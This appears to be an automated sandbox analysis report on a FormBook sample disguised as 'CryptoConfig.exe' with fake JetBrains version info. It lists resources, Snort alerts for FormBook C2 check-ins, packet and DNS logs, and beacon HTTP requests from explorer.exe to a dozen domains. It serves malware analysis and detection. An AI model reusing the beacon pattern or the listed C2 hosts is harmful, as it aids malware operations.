                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0xa42000x99e7PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                      RT_ICON0xadbf80x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                      RT_ICON0xbe4300x94a8data
                                                                      RT_ICON0xc78e80x5488data
                                                                      RT_ICON0xccd800x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432
                                                                      RT_ICON0xd0fb80x25a8data
                                                                      RT_ICON0xd35700x10a8data
                                                                      RT_ICON0xd46280x988data
                                                                      RT_ICON0xd4fc00x468GLS_BINARY_LSB_FIRST
                                                                      RT_GROUP_ICON0xd54380x84data
                                                                      RT_VERSION0xd54cc0x380data
                                                                      RT_MANIFEST0xd585c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Version Infos

                                                                      DescriptionData
                                                                      Translation0x0000 0x04b0
                                                                      LegalCopyrightCopyright 2003 - 2021
                                                                      Assembly Version7.0.5.0
                                                                      InternalNameCryptoConfig.exe
                                                                      FileVersion7.0.5.0
                                                                      CompanyNameJet Brain Inc.
                                                                      LegalTrademarks
                                                                      Comments
                                                                      ProductNameJetBrain Assemblies
                                                                      ProductVersion7.0.5.0
                                                                      FileDescriptionJetBrain Assemblies
                                                                      OriginalFilenameCryptoConfig.exe

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      06/10/21-18:08:06.041509TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.474.220.199.8
                                                                      06/10/21-18:08:06.041509TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.474.220.199.8
                                                                      06/10/21-18:08:06.041509TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.474.220.199.8
                                                                      06/10/21-18:08:23.084972TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4199.195.117.147
                                                                      06/10/21-18:08:23.084972TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4199.195.117.147
                                                                      06/10/21-18:08:23.084972TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4199.195.117.147
                                                                      06/10/21-18:08:34.522965TCP1201ATTACK-RESPONSES 403 Forbidden804977299.83.154.118192.168.2.4
                                                                      06/10/21-18:08:55.714557TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.4104.21.15.16
                                                                      06/10/21-18:08:55.714557TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.4104.21.15.16
                                                                      06/10/21-18:08:55.714557TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.4104.21.15.16

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jun 10, 2021 18:07:54.164665937 CEST4976380192.168.2.4147.255.162.204
                                                                      Jun 10, 2021 18:07:54.359803915 CEST8049763147.255.162.204192.168.2.4
                                                                      Jun 10, 2021 18:07:54.359915018 CEST4976380192.168.2.4147.255.162.204
                                                                      Jun 10, 2021 18:07:54.360044956 CEST4976380192.168.2.4147.255.162.204
                                                                      Jun 10, 2021 18:07:54.556164026 CEST8049763147.255.162.204192.168.2.4
                                                                      Jun 10, 2021 18:07:54.556201935 CEST8049763147.255.162.204192.168.2.4
                                                                      Jun 10, 2021 18:07:54.556276083 CEST8049763147.255.162.204192.168.2.4
                                                                      Jun 10, 2021 18:07:54.556405067 CEST8049763147.255.162.204192.168.2.4
                                                                      Jun 10, 2021 18:07:54.556427956 CEST8049763147.255.162.204192.168.2.4
                                                                      Jun 10, 2021 18:07:54.556442976 CEST4976380192.168.2.4147.255.162.204
                                                                      Jun 10, 2021 18:07:54.556504965 CEST4976380192.168.2.4147.255.162.204
                                                                      Jun 10, 2021 18:07:54.556608915 CEST4976380192.168.2.4147.255.162.204
                                                                      Jun 10, 2021 18:07:59.927434921 CEST4976480192.168.2.4163.44.239.73
                                                                      Jun 10, 2021 18:08:00.230904102 CEST8049764163.44.239.73192.168.2.4
                                                                      Jun 10, 2021 18:08:00.232320070 CEST4976480192.168.2.4163.44.239.73
                                                                      Jun 10, 2021 18:08:00.232477903 CEST4976480192.168.2.4163.44.239.73
                                                                      Jun 10, 2021 18:08:00.535759926 CEST8049764163.44.239.73192.168.2.4
                                                                      Jun 10, 2021 18:08:00.626985073 CEST8049764163.44.239.73192.168.2.4
                                                                      Jun 10, 2021 18:08:00.627013922 CEST8049764163.44.239.73192.168.2.4
                                                                      Jun 10, 2021 18:08:00.627228975 CEST4976480192.168.2.4163.44.239.73
                                                                      Jun 10, 2021 18:08:00.627295017 CEST4976480192.168.2.4163.44.239.73
                                                                      Jun 10, 2021 18:08:00.929238081 CEST8049764163.44.239.73192.168.2.4
                                                                      Jun 10, 2021 18:08:05.850341082 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.041214943 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.041311026 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.041508913 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.536820889 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.552520037 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.723648071 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.724903107 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.724936008 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.724961042 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.724983931 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.724997997 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.724999905 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.725017071 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.725037098 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.725086927 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.726949930 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.739317894 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.739464045 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:11.661992073 CEST4976680192.168.2.4172.107.55.6
                                                                      Jun 10, 2021 18:08:11.820837021 CEST8049766172.107.55.6192.168.2.4
                                                                      Jun 10, 2021 18:08:11.821013927 CEST4976680192.168.2.4172.107.55.6
                                                                      Jun 10, 2021 18:08:11.821222067 CEST4976680192.168.2.4172.107.55.6
                                                                      Jun 10, 2021 18:08:11.980761051 CEST8049766172.107.55.6192.168.2.4
                                                                      Jun 10, 2021 18:08:12.061254978 CEST8049766172.107.55.6192.168.2.4
                                                                      Jun 10, 2021 18:08:12.061285973 CEST8049766172.107.55.6192.168.2.4
                                                                      Jun 10, 2021 18:08:12.061460018 CEST4976680192.168.2.4172.107.55.6
                                                                      Jun 10, 2021 18:08:12.061542988 CEST4976680192.168.2.4172.107.55.6
                                                                      Jun 10, 2021 18:08:12.218924999 CEST8049766172.107.55.6192.168.2.4
                                                                      Jun 10, 2021 18:08:17.318051100 CEST4976780192.168.2.454.69.66.227
                                                                      Jun 10, 2021 18:08:17.524992943 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:17.525393009 CEST4976780192.168.2.454.69.66.227
                                                                      Jun 10, 2021 18:08:17.525732040 CEST4976780192.168.2.454.69.66.227
                                                                      Jun 10, 2021 18:08:17.731508970 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:17.743844032 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:17.743889093 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:17.744141102 CEST4976780192.168.2.454.69.66.227
                                                                      Jun 10, 2021 18:08:17.744194031 CEST4976780192.168.2.454.69.66.227
                                                                      Jun 10, 2021 18:08:17.950335979 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:22.932153940 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.084594011 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:23.084788084 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.084971905 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.237189054 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:23.239788055 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:23.240160942 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:23.240279913 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.240338087 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.394629002 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:28.335777044 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:28.562704086 CEST8049769156.241.53.161192.168.2.4
                                                                      Jun 10, 2021 18:08:28.562905073 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:28.563146114 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:28.789860010 CEST8049769156.241.53.161192.168.2.4
                                                                      Jun 10, 2021 18:08:29.070154905 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:29.303756952 CEST8049769156.241.53.161192.168.2.4
                                                                      Jun 10, 2021 18:08:29.303797960 CEST8049769156.241.53.161192.168.2.4
                                                                      Jun 10, 2021 18:08:29.303965092 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:29.304640055 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:34.289700985 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.334131956 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.334474087 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.334511042 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.376698971 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.522964954 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.523000002 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.523241043 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.527183056 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.545643091 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.546340942 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.569499016 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:39.602478981 CEST4977380192.168.2.4198.54.117.216
                                                                      Jun 10, 2021 18:08:39.800178051 CEST8049773198.54.117.216192.168.2.4
                                                                      Jun 10, 2021 18:08:39.800331116 CEST4977380192.168.2.4198.54.117.216
                                                                      Jun 10, 2021 18:08:39.800529003 CEST4977380192.168.2.4198.54.117.216
                                                                      Jun 10, 2021 18:08:39.998404980 CEST8049773198.54.117.216192.168.2.4
                                                                      Jun 10, 2021 18:08:39.998456001 CEST8049773198.54.117.216192.168.2.4
                                                                      Jun 10, 2021 18:08:45.103743076 CEST4977480192.168.2.4198.185.159.144

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jun 10, 2021 18:06:41.407711983 CEST5453153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:41.458219051 CEST53545318.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:42.566379070 CEST4971453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:42.618700981 CEST53497148.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:44.812927961 CEST5802853192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:44.864168882 CEST53580288.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:46.021019936 CEST5309753192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:46.074609041 CEST53530978.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:47.375886917 CEST4925753192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:47.431807041 CEST53492578.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:48.176485062 CEST6238953192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:48.228964090 CEST53623898.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:49.382594109 CEST4991053192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:49.435808897 CEST53499108.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:50.570723057 CEST5585453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:50.625188112 CEST53558548.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:51.416126013 CEST6454953192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:51.466497898 CEST53645498.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:52.653862953 CEST6315353192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:52.704343081 CEST53631538.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:53.551484108 CEST5299153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:53.601452112 CEST53529918.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:54.740502119 CEST5370053192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:54.790579081 CEST53537008.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:55.572715998 CEST5172653192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:55.633346081 CEST53517268.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:56.539563894 CEST5679453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:56.592868090 CEST53567948.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:58.646500111 CEST5653453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:58.697787046 CEST53565348.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:59.822455883 CEST5662753192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:59.872442007 CEST53566278.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:01.604384899 CEST5662153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:01.663435936 CEST53566218.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:02.504225016 CEST6311653192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:02.554306984 CEST53631168.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:03.592953920 CEST6407853192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:03.642983913 CEST53640788.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:10.800828934 CEST6480153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:10.859791994 CEST53648018.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:32.513550043 CEST6172153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:32.574834108 CEST53617218.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:33.608347893 CEST5125553192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:33.668716908 CEST53512558.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:34.408015013 CEST6152253192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:34.469630003 CEST53615228.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:34.636287928 CEST5233753192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:34.698220015 CEST53523378.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:35.500509024 CEST5504653192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:35.562103033 CEST53550468.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:36.458476067 CEST4961253192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:36.498214960 CEST4928553192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:36.519891024 CEST53496128.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:36.559676886 CEST53492858.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:37.769285917 CEST5060153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:37.835247993 CEST53506018.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:38.574868917 CEST6087553192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:38.636751890 CEST53608758.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:42.846527100 CEST5644853192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:42.902825117 CEST53564488.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:44.378021955 CEST5917253192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:44.431400061 CEST53591728.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:48.740762949 CEST6242053192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:48.794127941 CEST53624208.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:51.238238096 CEST6057953192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:51.297835112 CEST53605798.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:54.095107079 CEST5018353192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:54.157947063 CEST53501838.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:59.578603029 CEST6153153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:59.925715923 CEST53615318.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:05.635307074 CEST4922853192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:05.848440886 CEST53492288.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:11.596757889 CEST5979453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:11.660926104 CEST53597948.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:17.074579000 CEST5591653192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:17.316402912 CEST53559168.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:22.765113115 CEST5275253192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:22.930680990 CEST53527528.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:28.274285078 CEST6054253192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:28.334353924 CEST53605428.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:28.716119051 CEST6068953192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:28.787224054 CEST53606898.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:30.174724102 CEST6420653192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:30.241816044 CEST53642068.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:34.191879034 CEST5090453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:34.281604052 CEST53509048.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:39.533937931 CEST5752553192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:39.601340055 CEST53575258.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:45.041973114 CEST5381453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:45.102824926 CEST53538148.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:50.419904947 CEST5341853192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:50.479913950 CEST53534188.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:55.608623981 CEST6283353192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:55.671185970 CEST53628338.8.8.8192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Jun 10, 2021 18:07:54.095107079 CEST192.168.2.48.8.8.80x3a99Standard query (0)www.balloon-artists.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:07:59.578603029 CEST192.168.2.48.8.8.80x5f1eStandard query (0)www.adultpeace.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:05.635307074 CEST192.168.2.48.8.8.80xd68Standard query (0)www.cmannouncements.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:11.596757889 CEST192.168.2.48.8.8.80x42f5Standard query (0)www.leonardocarrillo.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:17.074579000 CEST192.168.2.48.8.8.80xd9bdStandard query (0)www.dreamcashbuyers.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:22.765113115 CEST192.168.2.48.8.8.80x4cf8Standard query (0)www.swayam-moj.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:28.274285078 CEST192.168.2.48.8.8.80x8ca5Standard query (0)www.hfjxhs.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:34.191879034 CEST192.168.2.48.8.8.80xa57fStandard query (0)www.defenestration.worldA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.533937931 CEST192.168.2.48.8.8.80x5c24Standard query (0)www.boogerstv.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:45.041973114 CEST192.168.2.48.8.8.80x4fdStandard query (0)www.totally-seo.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:50.419904947 CEST192.168.2.48.8.8.80xdc7dStandard query (0)www.cleanxcare.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:55.608623981 CEST192.168.2.48.8.8.80xb13Standard query (0)www.myfavbutik.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Jun 10, 2021 18:07:54.157947063 CEST8.8.8.8192.168.2.40x3a99No error (0)www.balloon-artists.com147.255.162.204A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:07:59.925715923 CEST8.8.8.8192.168.2.40x5f1eNo error (0)www.adultpeace.comadultpeace.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:07:59.925715923 CEST8.8.8.8192.168.2.40x5f1eNo error (0)adultpeace.com163.44.239.73A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:05.848440886 CEST8.8.8.8192.168.2.40xd68No error (0)www.cmannouncements.com74.220.199.8A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:11.660926104 CEST8.8.8.8192.168.2.40x42f5No error (0)www.leonardocarrillo.com172.107.55.6A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:17.316402912 CEST8.8.8.8192.168.2.40xd9bdNo error (0)www.dreamcashbuyers.comsites.propelio.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:08:17.316402912 CEST8.8.8.8192.168.2.40xd9bdNo error (0)sites.propelio.comsites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:08:17.316402912 CEST8.8.8.8192.168.2.40xd9bdNo error (0)sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com54.69.66.227A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:17.316402912 CEST8.8.8.8192.168.2.40xd9bdNo error (0)sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com18.236.1.157A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:17.316402912 CEST8.8.8.8192.168.2.40xd9bdNo error (0)sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com34.215.222.250A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:22.930680990 CEST8.8.8.8192.168.2.40x4cf8No error (0)www.swayam-moj.comswayam-moj.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:08:22.930680990 CEST8.8.8.8192.168.2.40x4cf8No error (0)swayam-moj.com199.195.117.147A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:28.334353924 CEST8.8.8.8192.168.2.40x8ca5No error (0)www.hfjxhs.com156.241.53.161A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:34.281604052 CEST8.8.8.8192.168.2.40xa57fNo error (0)www.defenestration.world99.83.154.118A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)www.boogerstv.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:45.102824926 CEST8.8.8.8192.168.2.40x4fdNo error (0)www.totally-seo.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:08:45.102824926 CEST8.8.8.8192.168.2.40x4fdNo error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:45.102824926 CEST8.8.8.8192.168.2.40x4fdNo error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:45.102824926 CEST8.8.8.8192.168.2.40x4fdNo error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:45.102824926 CEST8.8.8.8192.168.2.40x4fdNo error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:50.479913950 CEST8.8.8.8192.168.2.40xdc7dNo error (0)www.cleanxcare.comcleanxcare.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:08:50.479913950 CEST8.8.8.8192.168.2.40xdc7dNo error (0)cleanxcare.com78.31.67.91A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:55.671185970 CEST8.8.8.8192.168.2.40xb13No error (0)www.myfavbutik.com104.21.15.16A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:55.671185970 CEST8.8.8.8192.168.2.40xb13No error (0)www.myfavbutik.com172.67.161.4A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.balloon-artists.com
                                                                      • www.adultpeace.com
                                                                      • www.cmannouncements.com
                                                                      • www.leonardocarrillo.com
                                                                      • www.dreamcashbuyers.com
                                                                      • www.swayam-moj.com
                                                                      • www.hfjxhs.com
                                                                      • www.defenestration.world
                                                                      • www.boogerstv.com
                                                                      • www.totally-seo.com
                                                                      • www.cleanxcare.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.449763147.255.162.20480C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:07:54.360044956 CEST4940OUTGET /p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.balloon-artists.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:07:54.556164026 CEST4940INHTTP/1.1 200 OK
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Server: Nginx Microsoft-HTTPAPI/2.0
                                                                      X-Powered-By: Nginx
                                                                      Date: Thu, 10 Jun 2021 16:07:51 GMT
                                                                      Connection: close
                                                                      Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                      Data Ascii: 3


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.449764163.44.239.7380C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
